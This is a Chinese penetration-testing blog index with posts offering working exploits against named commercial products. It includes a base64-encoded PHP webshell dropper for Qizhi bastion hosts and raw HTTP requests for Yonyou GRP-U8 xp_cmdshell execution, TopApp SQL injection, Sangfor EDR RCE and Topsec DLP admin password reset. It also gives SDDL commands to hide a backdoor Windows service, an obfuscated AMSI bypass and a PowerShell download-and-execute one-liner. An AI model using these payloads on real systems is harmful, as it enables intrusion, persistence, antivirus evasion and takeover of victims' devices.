使用正则快速从 js 文件里提取处 API path 渗透测试

前言

在渗透测试的时候,遇到前后分离的站点,多数与后端通信的 API path 就在 js 文件里,且大多数名称为 app.xxxx.js 这类以 app 开头的 js 文件里面。
而且这类 js 文件大多数是混淆过的,或者压缩过,又臭又长!

正则提取 API path

在 js 文...


Mrxn 发布于 2022-3-17 20:41

蓝队技巧:查找被隐藏的Windows服务项 渗透测试

在上篇,我们说过红队技巧:隐藏windows服务,今天抽空来更新下,如何查找这类隐藏的Windows服务项。 首先看下效果,使用powershell远程下载执行直接获得隐藏的Windows服务名称:

check.png
通过远程下载执行无文件落地查看隐藏Windows服务:
powershell -c "IEX (New-Object Net.WebClient).DownloadString('h...

Mrxn 发布于 2020-10-23 19:13

红队技巧:隐藏windows服务 渗透测试

后渗透测试中,我们拿到了目标机器的权限后,要想办法维持权限,保持持久,嗯,很重要,不管生活还是工作都需要持久!

利用windows服务来植入我们的后门也是一种常见的利用方式,但是往往一般植入的服务很容易被管理员在任务管理器看到。如果可以隐藏的话,就大大提高了我们的持久性,今天就介绍下一种利用powershell来进行隐藏windows服务的技巧,重启后也可以正常启动。

首先创建一个服务(需要系统管理员权限运行的CMD):

sc create mrxn binPath=C:/Users/mrxn.net/Desktop/mrxn.exe start=auto

sc_create.png

如上图所示可以看到成功创建了一个名为 mrxn 的windows服务,实战过程可以加上一些描述,取一个迷惑性的名字等等操作迷惑对手。

然后以管理员权限打开一个 powershell 窗口,运行安全描述符定义语言(SDDL)命令来隐藏我们创建的 mrxn 服务:

& $env:SystemRoot\System32\sc.exe sdset mrxn "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"

hide.png

运行成功后,在我们的任务管理器里面就看不到创建的 mrxn 服务了(需要重启任务管理器或者你命令刷新)

如果你不想隐藏次windows服务了,运行以下安全描述符定义语言(SDDL)命令来取消隐藏即可:

& $env:SystemRoot\System32\sc.exe sdset mrxn "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"

unhide.png


如上图所示,成功取消隐藏windows服务。

这种方法对于红队来说,还是有一定作用的,欢迎渗透大佬们实践评论。

详细的原理来自这里:https://www.sans.org/blog/red-team-tactics-hiding-windows-services/ 我只是实践者。
查找隐藏的Windows服务项:

蓝队技巧:查找被隐藏的Windows服务项


Mrxn 发布于 2020-10-16 11:50

零组镜像打包下载 零组文章下载(截止到2020年3月的版本和2020年09月19日版本) 渗透测试

shotpic_2020-10-14_22-22-09.png

web安全

74cms

ActiveMQ

Adminer

Adobe ColdFusion

Apache

Apache Dubbo

Apache FusionAuth

Apache HTTPD

Apache Log4j

Apache SSI

Apereo CAS

AppWeb

Aria2

Cacti

CatfishCMS

Citrix NetScaler

CmsEasy

Cobub Razor

Computrols CBAS Web

Confluence

Coremail

Couchcms

CouchDB

Dedecms

Discuz

Django

Docker

Elasticsearch

Emlog

Eyoucms

FasterXML jackson

Fastjson

FCKeditor

Finecms

Flash

Fortinet FortiOS

GetSimple CMS

Gitbook

Gitlab

GoAhead

Google

Hadoop

Harbor

Hashbrown CMS

ImageMagick

Imcat

IonizeCMS

Jboss

Jenkins

Jira

Joomal

JYmusic

kibana

Maccms

Mariadb

Memcache

MetInfo

Microsoft Exchange

Mintinstall

Mongo DB

MyBB

Mysql

Newbee-mall

Nexus

Niushop

Nostromo httpd

OKLite

OpenSNS

PageMyAdmin

PbootCMS

Php

Phpcms

phpmyadmin

PHPOK

Phpweb

PhpYun

Pluck cms

Pyspider

R&D Visions CMS

rConfig

Redis

Seacms

Semcms

Smarty

Spring Cloud Config Server

SQL Server

ThinkCMF

Thinkphp

Thinkphp shop

Tomcat

Ueditor

UsualToolcms

vBulletin

Weblogic

Webmin

WeCenter

Wordpress

X5music

Xfilesharing

YouDianCMS

Yunucms

Yunyecms

YXcms

YzmCMS

Zzcms

Zzzcms

微擎

有道云笔记

泛微oa

禅知

禅道

致远oa

通达oa



iot

360

Amazon Kindle Fire HD

Cisco

D-Link

Huawei

JCG

PHICOMM

Sapido

TP-Link



安全工具

Burpsuite

Cobalt Strike

Cobalt Strike 4.0

Sqlmap

Sqlmap proxy

Sqlmap tamper

Sqlmap+burpsuit辅助批量注入验证

子域名扫描

指纹

游览器插件



安全技术

Disable functions

Linux后门

sql

Windows取证

上传绕过

常用命令



内网渗透

内网穿透:

ABPTTS

Anydesk

ew

frp

lcx

nc

reGeorg

ssocks

teamviewer


内网渗透:

DBscanner

Windows常用程序密码读取工具

内网渗透之获取windows远程桌面(RDP)连接记录

利用windows api dump进程

金山毒霸



提权exp

linux

windows


零组镜像打包下载 零组文章下载:

汇总:https://cloud.189.cn/t/INN7byuQNnQz(访问码:4xny)

https://cloud.189.cn/t/ZV7F7fzIRfIf(访问码:c49j)

https://mega.nz/file/OcVHzY7C#wrVRXSsj8lo7_6_Qp7BbOqf-dAmvVfAm_-NMZaIJbc8

https://mega.nz/file/PZVnkShT#AZv2rRmU-_5M4Kp5m0zG2NMSNosqeoehiKjzGA_86ZA

https://cloud.189.cn/t/2qAfMjeUJNra(访问码:7bhr)

解压密码:mrxn.net



Mrxn 发布于 2020-10-14 22:20

fastadmin(V1.0.0.20200506_beta)前台getshell(文件上传解析)漏洞分析 渗透测试

0x1.简介

FastAdmin是一款基于ThinkPHP和Bootstrap的极速后台开发框架。

补天平台介绍:近日,补天漏洞响应平台监测到互联网上出现Fastadmin文件上传漏洞,exp被公开。该漏洞源于网络系统或产品的代码开发过程中存在设计或实现不当的问题,可导致文件上传并解析为可执行文件。目前厂商已发布新版本修复此漏洞,补天漏洞响应平台建议受影响的客户将框架更新至安全版本。

影响版本:V1.0.0.20180911_beta~V1.0.0.20200506_beta

修复建议:

升级Fastadmin版本到V1.0.0.20200920_beta,详见官网链接:

https://www.fastadmin.net/download.html

0x2.漏洞详情

利用限制:需要开启会员中心功能,且登录会员中心。

/application/config.php 文件中:

  //是否开启前台会员中心
    'usercenter'            => true,

漏洞分析

/application/index/User.php 文件

第58-67行:

public function _empty($name)
    {    
        $data = Hook::listen("user_request_empty", $name);
            foreach ($data as $index => $datum) {
            $this->view->assign($datum);
            }
    return $this->view->fetch($name);
}

user_request_empty 为开发者预留的钩子可以忽视不看,主要看 return $this->view->fetch($name);

此方法中的 $name 参数可控,并且将 $name 的值传入到了 fecth() 函数中。

fetch() 为thinkphp的解析模板函数,其返回模板文件渲染后的内容

fetch() 函数的关键内容如下:

public function fetch($template, $data = [], $config = [])
    {
        if ('' == pathinfo($template, PATHINFO_EXTENSION)) {
            // 获取模板文件名
            $template = $this->parseTemplate($template);
        }
        // 模板不存在 抛出异常
        if (!is_file($template)) {
            throw new TemplateNotFoundException('template not exists:' . $template, $template);
        }
        // 记录视图信息
        App::$debug && Log::record('[ VIEW ] ' . $template . ' [ ' . var_export(array_keys($data), true) . ' ]', 'info');
        $this->template->fetch($template, $data, $config);
    }

继续调用栈可以看下其实这个fetch()函数调用的是内置模板引擎的fetch方法, 这个方法实际上就是将要输出的页面内容赋值给一个变量,为了方便,thinkphp在对模板渲染的过程中,添加了php标签功能,使得其可以解析php代码。

总之一句话,这个漏洞其实就是由于对传入变量过滤不严导致的模板引擎注入漏洞,只要控制了传入模板的文件,就可以利用模板本身的渲染功能,实现包含漏洞getshell

另外需要注意的是,当验证传入的模板是否是文件时,使用的 is_file() 函数,这个函数在Linux下和windows下的判断会有所不同,具体如下:

1、在linux下利用 is_file() 来判断类似于 /****/../../../../etc/passwd 文件时,如果 **** 是不存在的目录,则会返回false,在windows下 ,这个目录存在与否,均返回true,如下图所示:

is_file.png

is_file_linux.png


2、在linux下, is_file() 函数判可用于判断符号链接

3、在linux下, is_file 函数会受到权限的影响,当前用户权限不足或父目录没有设置+x权限时, is_file() 会返回false

4、windows系统里面 / 和 \ 都可以使用,但是在linux下只能使用 / 来分隔路径,因此这会导致 is_file() 在不同系统下的返回结果不一致

is_file_d.png

is_file_d2.png


5、 is_file() 判断文件时,如果文件大小超过2^32时,会判断失败

0x3.漏洞验证

通过前文可知,这个漏洞的利用点在 _empty() 函数,需要注意的是,在官方文档中通常 _empty() 方法是用来判断一个方法是否存在,如果不存在,则进入该函数。而这里是开发者自定义的方法,因此直接传入 _empty 方法,调用name参数即可。

利用过程如下:

在前台的会员中心,个人资料处,上传修改头像:

headpic.png

抓包后修改图片数据(满足图片头格式即可):

bp_head.png

记录下路径后,成功getshell

getshell.png

在Linux下,通过这种方法会失效,因为在 /public 路径下不存在 user 目录,由前文中的知识点可以知道,当不存在这个目录的时候,无论怎么跳转目录, is_file() 函数返回的结果始终未false,因此无法利用该漏洞,如下图所示:

linux.png

当我们在 /public 目录下创建文件夹 /user ,在利用,即可成功:

linux2.png

最后感谢 @joseph 师傅提供的漏洞点,又学习了一波

文章出自:https://forum.90sec.com/t/topic/1294

作者:https://forum.90sec.com/u/panda

大家可以投稿90注册啊!给你们投票!哈哈哈


Mrxn 发布于 2020-9-21 22:57

深信服VPN 修改任意账户绑定手机号 渗透测试

https://路径/por/changetelnum.csp?apiversion=1newtel=TARGET_PHONE&sessReq=clusterd&username=TARGET_USERNAME&grpid=0&sessid=0&ip=127.0.0.1

注意 需要登录之后才可以


Mrxn 发布于 2020-9-18 10:24

CVE-2020-1472: NetLogon特权提升漏洞(接管域控制器) 渗透测试

1C1ABDCA-7614-4E35-9DCB-392FE8E3D0F0.jpeg0x01 更新概览

2020年09月14日,360CERT监测发现 secura 公开了针对该漏洞研究报告及PoC,可造成 权限提升影响。本次更新标识该漏洞的利用工具公开,并可能在短时间内出现攻击态势。

具体更新详情可参考: 漏洞验证

0x02 漏洞简述

2020年08月12日, 360CERT监测发现 Windows官方 发布了 NetLogon 特权提升漏洞 的风险通告,该漏洞编号为 CVE-2020-1472,漏洞等级:严重,漏洞评分:10分

攻击者通过NetLogon(MS-NRPC),建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程序。

对此,360CERT建议广大用户及时为各Windows Server操作系统安装最新相关补丁。与此同时,请做好资产自查以及预防工作,以免遭受黑客攻击。

0x03 风险等级

360CERT对该漏洞的评定结果如下

评定方式 等级
威胁等级 严重
影响面 广泛
360CERT评分 10分

0x04 漏洞详情

NetLogon组件 是 Windows 上一项重要的功能组件,用于用户和机器在域内网络上的认证,以及复制数据库以进行域控备份,同时还用于维护域成员与域之间、域与域控之间、域DC与跨域DC之间的关系。

当攻击者使用 Netlogon 远程协议 (MS-NRPC) 建立与域控制器连接的易受攻击的 Netlogon 安全通道时,存在特权提升漏洞。成功利用此漏洞的攻击者可以在网络中的设备上运行经特殊设计的应用程序。

漏洞验证

使用 SecuraBV/zerologon_tester.py 进行验证;可以看到在 windows server 2012 结果如下图所示

python版本: 3.8.5
域控版本: windows server 2008
测试机版本: windows server 2012

6A186A47-E390-4BEB-9190-F1C6CDE364D2.png0x05 影响版本

- Windows Server 2008 R2 for x64-based Systems Service Pack 1

- Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

- Windows Server 2012

- Windows Server 2012 (Server Core installation)

- Windows Server 2012 R2

- Windows Server 2012 R2 (Server Core installation)

- Windows Server 2016

- Windows Server 2016 (Server Core installation)

- Windows Server 2019

- Windows Server 2019 (Server Core installation)

- Windows Server, version 1903 (Server Core installation)

- Windows Server, version 1909 (Server Core installation)

- Windows Server, version 2004 (Server Core installation)

相关检测和利用工具地址:

https://github.com/SecuraBV/CVE-2020-1472

https://github.com/dirkjanm/CVE-2020-1472


Mrxn 发布于 2020-9-15 12:10

泛微OA云桥任意文件读取漏洞 渗透测试

泛微0A的这个漏洞利用/wxjsapi/saveYZJFile接口获取filepath,返回数据包内出现了程序的绝对路径,攻击者可以通过返回内容识别程序运行路径从而下载数据库配置文件危害可见。


1、downloadUrl参数修改成需要获取文件的绝对路径,记录返回包中的id值。

6E7F6ABE-E697-42B4-80B4-1A50A615961B.jpeg


2、通过查看文件接口访问 /file/fileNoLogin/id

4B7248E9-87D1-4A45-866B-6E153145E84D.jpeg

可参考微步的情报:

weibu.png

weibu2.png



Mrxn 发布于 2020-9-12 19:58

天融信数据防泄漏系统越权修改管理员密码 渗透测试

EEE26ECA-6A7F-4BA2-A274-713511D57CA5.jpeg


无需登录权限,由于修改密码处未校验原密码,且/?module=auth_user&action=mod_edit_pwd

接口未授权访问,造成直接修改任意用户密码。:默认superman账户uid为1。


POST /?module=auth_user&action=mod_edit_pwd

Cookie: username=superman;


uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1


Mrxn 发布于 2020-9-12 07:55

齐治堡垒机前台远程命令执行漏洞 渗透测试

齐治堡垒机前台远程命令执行漏洞(CNVD-2019-20835)

未授权无需登录。

B3871B35-D8B3-4095-8032-D7512B3C6FDF.jpeg

1、访问 http://10.20.10.11/listener/cluster_manage.php  :返回 "OK".

2、访问如下链接即可getshell,执行成功后,生成PHP一句话马

3、/var/www/shterm/resources/qrcode/lbj77.php  密码10086

https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash`|${IFS}|echo${IFS}


Mrxn 发布于 2020-9-12 07:41

用友GRP-u8 注入+天融信TopApp-LB 负载均衡系统sql注入 渗透测试

用友GRP-U8R10行政事业财务管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件。

GRP-u8.png


该系统被曝存在命令执行漏洞,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击,漏洞细节以及相关漏洞poc如下:

用友GRP-u8 XXE漏洞(XML External Entity-XML外部实体注入):


POST /Proxy HTTP/1.1

Accept: Accept: */*

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)

Host: host

Content-Length: 357

Connection: Keep-Alive

Cache-Control: no-cache

cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'net user'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>


burp里面repeat即可:

GRP-u8-exec.png


天融信TopApp-LB 负载均衡系统sql注入


POST /acc/clsf/report/datasource.php HTTP/1.1

Host:

Connection: close

Accept: text/javascript, text/html, application/xml, text/xml, */*

X-Prototype-Version: 1.6.0.3

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: cors

Sec-Fetch-Dest: empty

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: PHPSESSID=ijqtopbcbmu8d70o5t3kmvgt57

Content-Type: application/x-www-form-urlencoded

Content-Length: 201

t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22--+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&[email protected]


至于前面的sangfor EDR RCE漏洞已经发过了。


Mrxn 发布于 2020-9-11 21:11

绿盟UTS综合威胁探针管理员任意登录复现 渗透测试

背景:

绿盟全流量威胁分析解决方案针对原始流量进行采集和监控,对流量信息进行深度还原、存储、查询和分析,可以及时掌握重要信息系统相关网络安全威胁风险,及时检测漏洞、病毒木马、网络攻击情况,及时发现网络安全事件线索,及时通报预警重大网络安全威胁,调查、防范和打击网络攻击等恶意行为,保障重要信息系统的网络安全。

绿盟综合威胁探针设备版本V2.0R00F02SP02及之前存在此漏洞。

绿盟的邮件回应:

尊敬的客户:

您好!

近日,收到客户反馈我司UTS产品存在“管理员任意登录漏洞”,此漏洞经过内部确认已于2020年8月进行了漏洞修复,并已经联系了受影响客户进行设备升级。现将相关情况说明如下:

此漏洞属于UTS某API存在敏感信息泄露的问题,攻击者可以绕过密码验证登录UTS设备。攻击者利用web特殊请求获取管理员权限,可对设备进行管控,修改防护策略,查看攻击信息和内网地址等资产信息,威胁设备安全。

此问题不是0day漏洞,不会泄露用户明文密码,不存在命令注入漏洞,攻击者无法利用此漏洞跳转攻击其它设备。目前我们已经在UTSV2.0R00F02SP03版本完成修复,升级官网发布的UTSV2.0R00F02SP03/UTSV2.0R00F02SP04升级包均可以解决此问题。同时请客户升级后,及时修改账户密码。

对于不具备升级条件的客户,请联系绿盟技术人员,绿盟技术人员为您提供技术支持进行解决。为您带来的不便,我们深感抱歉。


绿盟科技集团股份有限公司

2020年9月11日


漏洞利用过程:

85EF8388-B048-4CD9-834B-519410CE9E28.jpeg



4391E19E-D112-42C5-977D-468BCF217DFD.jpeg

对响应包进行修改,将false更改为true的时候可以泄露管理用户的md5值密码

72668C88-D15F-488C-AAD3-D509066895F8.jpegAB9A0FA6-D926-4EB0-946B-FDD1C77A3599.jpeg7598C79E-D4C7-4C85-ACB0-4B7CA91E2CFD.jpeg




利用渠道的md5值去登录页面

59EFFBA3-E0E3-49E7-B992-4514E13F67BF.jpeg


替换为 admin密码的md5:

7ac301836522b54afcbbed714534c7fb

71D0D4D4-65F0-4169-A94A-B418164745F1.jpeg


成功登录,登录后通过管理员权限对设备进行管控,并且可以看到大量的攻击信息,泄露内部网络地址包括资产管理。

A395E4DF-F12C-4367-906C-BD0025560490.jpeg





Mrxn 发布于 2020-9-11 17:38

HW礼盒:深信服edr RCE,天融信dlp unauth和通达OA v11.6版本RCE 渗透测试

HW礼盒,请查收:
深信服edr RCE
https://ip+端口/tool/log/c.php?strip_slashes=system&host=id 即可执行命令,
深信服EDR RCE (1).png
除上面之外,还有任意文件读取,验证码绕过,还有就是rce
任意用户登录:
注:2020年08月18日,fofa是通杀,版本小于 3.2.19
fofa指纹: title="SANGFOR终端检测响应平台"
payload:target+/ui/login.php?user=admin 即可直接登录:
SANGFOR (1).png
漏洞剖析:
在源码的:/web/ui/login.php 文件里面
登录判断的代码有一处让人感觉坑爹的地方:
SANGFOR-login (1).png


天融信dlp-未授权+越权

漏洞影响:已知版本号v3.1130.308p3_DLP.1

风险等级:高

漏洞细节:管理员登陆系统之后修改密码,未采用原由码校验,且存在未授权访问导致存在了越权修改管理员密码.

默认用户superman的uid=1

POST /?module-auth_user&action=mod_edit.pwd HTTP/1.1

修复==》找官网

奇安信天擎EDR管理服务器远程命令执行RCE漏洞:
漏洞描述:
影响范围:使用奇安信天擎EDR产品的主机
暂时不详
说明:
该漏洞通过深信服SSLVPN进入内网后,利用这类漏洞控制所有装有edr的机器。

深信服 vpn rce 漏洞详情暂时未知

致远OA-A8-V5最新版未授权getshell--七月火师傅暂未公开

通达OA11.6 preauth RCE
https://github.com/Mr-xn/Penetration_Testing_POC/blob/master/tools/%E9%80%9A%E8%BE%BEOA_v11.6_RCE_EXP.py 


Mrxn 发布于 2020-8-20 13:22

绕过AMSI执行powershell脚本 渗透测试

简单的演示下从老外哪里学来的bypass AMSI 的姿势,看下效果图: 

1.jpg

 

绕过AMSI执行powershell脚本

AMSI的全称是反恶意软件扫描接口(Anti-Malware Scan Interface),是从Windows 10开始引入的一种机制。AMSI是应用程序和服务能够使用的一种接口,程序和服务可以将“数据”发送到安装在系统上的反恶意软件服务(如Windows Defender)。

在基于场景的资产评估或者基于数据的红队评估中,许多渗透测试人员都会与AMSI打交道,因此对相关功能也比较了解。AMSI能够提供更强大的保护,可以为反恶意软件产品提供更透彻的可见性,因此能防御攻击过程中常用的一些现代工具、战术以及过程(TTP)。最相关的操作就是PowerShell无文件payload,在实际环境中,攻击者及渗透测试人员都在使用这种技术来完成任务。

正因为此,AMSI是大家广泛研究的一个主题,能否绕过AMSI已经成为攻击能否成功的决定性因素。在本文中,介绍了一种新的绕过方法。

关键powershell代码如下:

$a =[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils') 
$h="4456625220575263174452554847" 
$s =[string](0..13|%{[char][int](53+($h).substring(($_*2),2))})-replace " " 
$b =$a.GetField($s,'NonPublic,Static') $b.SetValue($null,$true)

效果如图:
AMSI_TN_bypass

代码来自:https://pastebin.com/sQFWANwr

参考文章:https://www.anquanke.com/post/id/180281


Mrxn 发布于 2020-7-2 23:12